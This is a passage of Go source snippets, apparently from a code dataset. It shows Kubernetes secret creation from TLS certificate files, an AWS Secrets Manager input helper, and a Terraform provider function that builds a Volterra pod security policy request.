ioutil.ReadFile(fmt.Sprintf(\"%s/sgadmin-key.pem\", certsDir))\n\tkibanaKey, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/kibana-key.pem\", certsDir))\n\tkibana, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/kibana.pem\", certsDir))\n\tcerebroKey, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/cerebro-key.pem\", certsDir))\n\tcerebro, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/cerebro.pem\", certsDir))\n\tsecret := &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: fmt.Sprintf(\"%s-%s\", secretName, clusterName),\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\t\"node-keystore.jks\": nodeKeyStore,\n\t\t\t\"sgadmin-keystore.jks\": sgadminKeyStore,\n\t\t\t\"truststore.jks\": trustStore,\n\t\t\t\"ca.pem\": ca,\n\t\t\t\"ca-key.pem\": caKey,\n\t\t\t\"node.pem\": node,\n\t\t\t\"node-key.pem\": nodeKey,\n\t\t\t\"node-key.pkcs8.pem\": nodeKeyPkcs8,\n\t\t\t\"sgadmin.pem\": sgadmin,\n\t\t\t\"sgadmin-key.pem\": sgadminKey,\n\t\t\t\"kibana-key.pem\": kibanaKey,\n\t\t\t\"kibana.pem\": kibana,\n\t\t\t\"cerebro-key.pem\": cerebroKey,\n\t\t\t\"cerebro.pem\": cerebro,\n\t\t},\n\t}\n\n\tif _, err = k.Kclient.CoreV1().Secrets(namespace).Create(secret); err != nil {\n\t\tlogrus.Error(\"Could not create elastic certs secret: \", err)\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func NewSecretAPI() *SecretAPI {\n\treturn &SecretAPI{}\n}", "func (ks keystore) createSecretInput(key string) *secretsmanager.GetSecretValueInput {\n\treturn &secretsmanager.GetSecretValueInput{\n\t\tSecretId: aws.String(key),\n\t}\n}", "func resourceVolterraK8SPodSecurityPolicyCreate(d *schema.ResourceData, meta interface{}) error {\n\tclient := meta.(*APIClient)\n\n\tcreateMeta := &ves_io_schema.ObjectCreateMetaType{}\n\tcreateSpec := &ves_io_schema_k8s_pod_security_policy.CreateSpecType{}\n\tcreateReq := &ves_io_schema_k8s_pod_security_policy.CreateRequest{\n\t\tMetadata: createMeta,\n\t\tSpec: createSpec,\n\t}\n\n\tif v, ok := d.GetOk(\"annotations\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tcreateMeta.Annotations = ms\n\t}\n\n\tif v, ok := d.GetOk(\"description\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Description =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"disable\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Disable =\n\t\t\tv.(bool)\n\t}\n\n\tif v, ok := d.GetOk(\"labels\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tcreateMeta.Labels = ms\n\t}\n\n\tif v, ok := d.GetOk(\"name\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Name =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"namespace\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Namespace =\n\t\t\tv.(string)\n\t}\n\n\t//config_method_choice\n\n\tconfigMethodChoiceTypeFound := false\n\n\tif v, ok := d.GetOk(\"psp_spec\"); ok && !configMethodChoiceTypeFound {\n\n\t\tconfigMethodChoiceTypeFound = true\n\t\tconfigMethodChoiceInt := &ves_io_schema_k8s_pod_security_policy.CreateSpecType_PspSpec{}\n\t\tconfigMethodChoiceInt.PspSpec = &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType{}\n\t\tcreateSpec.ConfigMethodChoice = configMethodChoiceInt\n\n\t\tsl := v.(*schema.Set).List()\n\t\tfor _, set := range sl {\n\t\t\tcs := set.(map[string]interface{})\n\n\t\t\tif v, ok := cs[\"allow_privilege_escalation\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowPrivilegeEscalation = v.(bool)\n\n\t\t\t}\n\n\t\t\tallowedCapabilitiesChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"allowed_capabilities\"]; ok && !isIntfNil(v) && !allowedCapabilitiesChoiceTypeFound {\n\n\t\t\t\tallowedCapabilitiesChoiceTypeFound = true\n\t\t\t\tallowedCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_AllowedCapabilities{}\n\t\t\t\tallowedCapabilitiesChoiceInt.AllowedCapabilities = &ves_io_schema_k8s_pod_security_policy.CapabilityListType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedCapabilitiesChoice = allowedCapabilitiesChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"capabilities\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tallowedCapabilitiesChoiceInt.AllowedCapabilities.Capabilities = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_allowed_capabilities\"]; ok && !isIntfNil(v) && !allowedCapabilitiesChoiceTypeFound {\n\n\t\t\t\tallowedCapabilitiesChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tallowedCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoAllowedCapabilities{}\n\t\t\t\t\tallowedCapabilitiesChoiceInt.NoAllowedCapabilities = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedCapabilitiesChoice = allowedCapabilitiesChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_csi_drivers\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedCsiDrivers = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_flex_volumes\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedFlexVolumes = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_host_paths\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\tallowedHostPaths := make([]*ves_io_schema_k8s_pod_security_policy.HostPathType, len(sl))\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedHostPaths = allowedHostPaths\n\t\t\t\tfor i, set := range sl {\n\t\t\t\t\tallowedHostPaths[i] = &ves_io_schema_k8s_pod_security_policy.HostPathType{}\n\t\t\t\t\tallowedHostPathsMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\tif w, ok := allowedHostPathsMapStrToI[\"path_prefix\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\tallowedHostPaths[i].PathPrefix = w.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif w, ok := allowedHostPathsMapStrToI[\"read_only\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\tallowedHostPaths[i].ReadOnly = w.(bool)\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_proc_mounts\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedProcMounts = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_unsafe_sysctls\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedUnsafeSysctls = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"default_allow_privilege_escalation\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.DefaultAllowPrivilegeEscalation = v.(bool)\n\n\t\t\t}\n\n\t\t\tdefaultCapabilitiesChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"default_capabilities\"]; ok && !isIntfNil(v) && !defaultCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdefaultCapabilitiesChoiceTypeFound = true\n\t\t\t\tdefaultCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_DefaultCapabilities{}\n\t\t\t\tdefaultCapabilitiesChoiceInt.DefaultCapabilities = &ves_io_schema_k8s_pod_security_policy.CapabilityListType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.DefaultCapabilitiesChoice = defaultCapabilitiesChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"capabilities\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdefaultCapabilitiesChoiceInt.DefaultCapabilities.Capabilities = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_default_capabilities\"]; ok && !isIntfNil(v) && !defaultCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdefaultCapabilitiesChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tdefaultCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoDefaultCapabilities{}\n\t\t\t\t\tdefaultCapabilitiesChoiceInt.NoDefaultCapabilities = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.DefaultCapabilitiesChoice = defaultCapabilitiesChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tdropCapabilitiesChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"drop_capabilities\"]; ok && !isIntfNil(v) && !dropCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdropCapabilitiesChoiceTypeFound = true\n\t\t\t\tdropCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_DropCapabilities{}\n\t\t\t\tdropCapabilitiesChoiceInt.DropCapabilities = &ves_io_schema_k8s_pod_security_policy.CapabilityListType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.DropCapabilitiesChoice = dropCapabilitiesChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"capabilities\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdropCapabilitiesChoiceInt.DropCapabilities.Capabilities = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_drop_capabilities\"]; ok && !isIntfNil(v) && !dropCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdropCapabilitiesChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tdropCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoDropCapabilities{}\n\t\t\t\t\tdropCapabilitiesChoiceInt.NoDropCapabilities = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.DropCapabilitiesChoice = dropCapabilitiesChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"forbidden_sysctls\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.ForbiddenSysctls = ls\n\n\t\t\t}\n\n\t\t\tfsGroupChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"fs_group_strategy_options\"]; ok && !isIntfNil(v) && !fsGroupChoiceTypeFound {\n\n\t\t\t\tfsGroupChoiceTypeFound = true\n\t\t\t\tfsGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_FsGroupStrategyOptions{}\n\t\t\t\tfsGroupChoiceInt.FsGroupStrategyOptions = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.FsGroupChoice = fsGroupChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tfsGroupChoiceInt.FsGroupStrategyOptions.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tfsGroupChoiceInt.FsGroupStrategyOptions.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_fs_groups\"]; ok && !isIntfNil(v) && !fsGroupChoiceTypeFound {\n\n\t\t\t\tfsGroupChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tfsGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoFsGroups{}\n\t\t\t\t\tfsGroupChoiceInt.NoFsGroups = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.FsGroupChoice = fsGroupChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tgroupChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_run_as_group\"]; ok && !isIntfNil(v) && !groupChoiceTypeFound {\n\n\t\t\t\tgroupChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tgroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoRunAsGroup{}\n\t\t\t\t\tgroupChoiceInt.NoRunAsGroup = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.GroupChoice = groupChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"run_as_group\"]; ok && !isIntfNil(v) && !groupChoiceTypeFound {\n\n\t\t\t\tgroupChoiceTypeFound = true\n\t\t\t\tgroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_RunAsGroup{}\n\t\t\t\tgroupChoiceInt.RunAsGroup = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.GroupChoice = groupChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tgroupChoiceInt.RunAsGroup.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tgroupChoiceInt.RunAsGroup.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_ipc\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostIpc = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_network\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostNetwork = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_pid\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostPid = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_port_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostPortRanges = v.(string)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"privileged\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.Privileged = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"read_only_root_filesystem\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.ReadOnlyRootFilesystem = v.(bool)\n\n\t\t\t}\n\n\t\t\truntimeClassChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_runtime_class\"]; ok && !isIntfNil(v) && !runtimeClassChoiceTypeFound {\n\n\t\t\t\truntimeClassChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\truntimeClassChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoRuntimeClass{}\n\t\t\t\t\truntimeClassChoiceInt.NoRuntimeClass = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.RuntimeClassChoice = runtimeClassChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"runtime_class\"]; ok && !isIntfNil(v) && !runtimeClassChoiceTypeFound {\n\n\t\t\t\truntimeClassChoiceTypeFound = true\n\t\t\t\truntimeClassChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_RuntimeClass{}\n\t\t\t\truntimeClassChoiceInt.RuntimeClass = &ves_io_schema_k8s_pod_security_policy.RuntimeClassStrategyOptions{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.RuntimeClassChoice = runtimeClassChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"allowed_runtime_class_names\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\truntimeClassChoiceInt.RuntimeClass.AllowedRuntimeClassNames = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"default_runtime_class_name\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\truntimeClassChoiceInt.RuntimeClass.DefaultRuntimeClassName = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tseLinuxChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_se_linux_options\"]; ok && !isIntfNil(v) && !seLinuxChoiceTypeFound {\n\n\t\t\t\tseLinuxChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tseLinuxChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoSeLinuxOptions{}\n\t\t\t\t\tseLinuxChoiceInt.NoSeLinuxOptions = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.SeLinuxChoice = seLinuxChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"se_linux_options\"]; ok && !isIntfNil(v) && !seLinuxChoiceTypeFound {\n\n\t\t\t\tseLinuxChoiceTypeFound = true\n\t\t\t\tseLinuxChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_SeLinuxOptions{}\n\t\t\t\tseLinuxChoiceInt.SeLinuxOptions = &ves_io_schema_k8s_pod_security_policy.SELinuxStrategyOptions{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.SeLinuxChoice = seLinuxChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"level\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Level = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"role\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Role = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"type\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Type = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"user\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.User = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tsupplementalGroupChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_supplemental_groups\"]; ok && !isIntfNil(v) && !supplementalGroupChoiceTypeFound {\n\n\t\t\t\tsupplementalGroupChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tsupplementalGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoSupplementalGroups{}\n\t\t\t\t\tsupplementalGroupChoiceInt.NoSupplementalGroups = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.SupplementalGroupChoice = supplementalGroupChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"supplemental_groups\"]; ok && !isIntfNil(v) && !supplementalGroupChoiceTypeFound {\n\n\t\t\t\tsupplementalGroupChoiceTypeFound = true\n\t\t\t\tsupplementalGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_SupplementalGroups{}\n\t\t\t\tsupplementalGroupChoiceInt.SupplementalGroups = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.SupplementalGroupChoice = supplementalGroupChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tsupplementalGroupChoiceInt.SupplementalGroups.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsupplementalGroupChoiceInt.SupplementalGroups.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tuserChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_run_as_user\"]; ok && !isIntfNil(v) && !userChoiceTypeFound {\n\n\t\t\t\tuserChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tuserChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoRunAsUser{}\n\t\t\t\t\tuserChoiceInt.NoRunAsUser = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.UserChoice = userChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"run_as_user\"]; ok && !isIntfNil(v) && !userChoiceTypeFound {\n\n\t\t\t\tuserChoiceTypeFound = true\n\t\t\t\tuserChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_RunAsUser{}\n\t\t\t\tuserChoiceInt.RunAsUser = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.UserChoice = userChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tuserChoiceInt.RunAsUser.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tuserChoiceInt.RunAsUser.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"volumes\"]; 